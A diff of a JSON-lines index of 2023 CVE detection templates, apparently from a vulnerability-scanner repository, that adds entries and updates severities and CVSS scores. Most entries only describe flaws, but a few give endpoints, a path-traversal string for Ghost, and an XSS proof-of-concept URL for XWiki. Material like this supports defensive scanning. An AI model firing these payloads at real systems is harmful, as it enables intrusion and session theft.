{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
@@ -2143,7 +2159,7 @@
{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
{"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
-{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"}
+{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"medium","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"}
{"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"}
{"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"}
{"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"}
@@ -2161,18 +2177,21 @@
{"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.7 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"}
{"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"}
{"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"}
-{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"}
+{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"}
{"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"}
{"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"}
+{"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"}
{"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"}
{"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"}
{"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"}
{"ID":"CVE-2023-35885","Info":{"Name":"Cloudpanel 2 \u003c 2.3.1 - Remote Code Execution","Severity":"critical","Description":"CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35885.yaml"}
{"ID":"CVE-2023-36144","Info":{"Name":"Intelbras Switch - Information Disclosure","Severity":"high","Description":"An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36144.yaml"}
+{"ID":"CVE-2023-36284","Info":{"Name":"QloApps 1.6.0 - SQL Injection","Severity":"high","Description":"An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36284.yaml"}
{"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"}
{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
{"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"}
{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
+{"ID":"CVE-2023-36347","Info":{"Name":"POS Codekop v2.0 - Broken Authentication","Severity":"high","Description":"A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36347.yaml"}
{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"critical","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
@@ -2202,6 +2221,7 @@
{"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"}
{"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"}
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
+{"ID":"CVE-2023-38964","Info":{"Name":"Academy LMS 6.0 - Cross-Site Scripting","Severity":"medium","Description":"Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38964.yaml"}
{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"}
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
{"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"}
@@ -2246,38 +2266,50 @@
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
+{"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"}
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
+{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
{"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"}
{"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"}
{"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"}
{"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"}
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
+{"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"}
+{"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"}
+{"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"}
+{"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"}
+{"ID":"CVE-2023-4542","Info":{"Name":"D-Link DAR-8000-10 - Command Injection","Severity":"critical","Description":"D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4542.yaml"}
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
+{"ID":"CVE-2023-45855","Info":{"Name":"qdPM 9.2 - Directory Traversal","Severity":"high","Description":"qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-45855.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
-{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"}
+{"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"}
+{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"}
{"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"}
{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
{"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"}
{"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"}
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
{"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"}
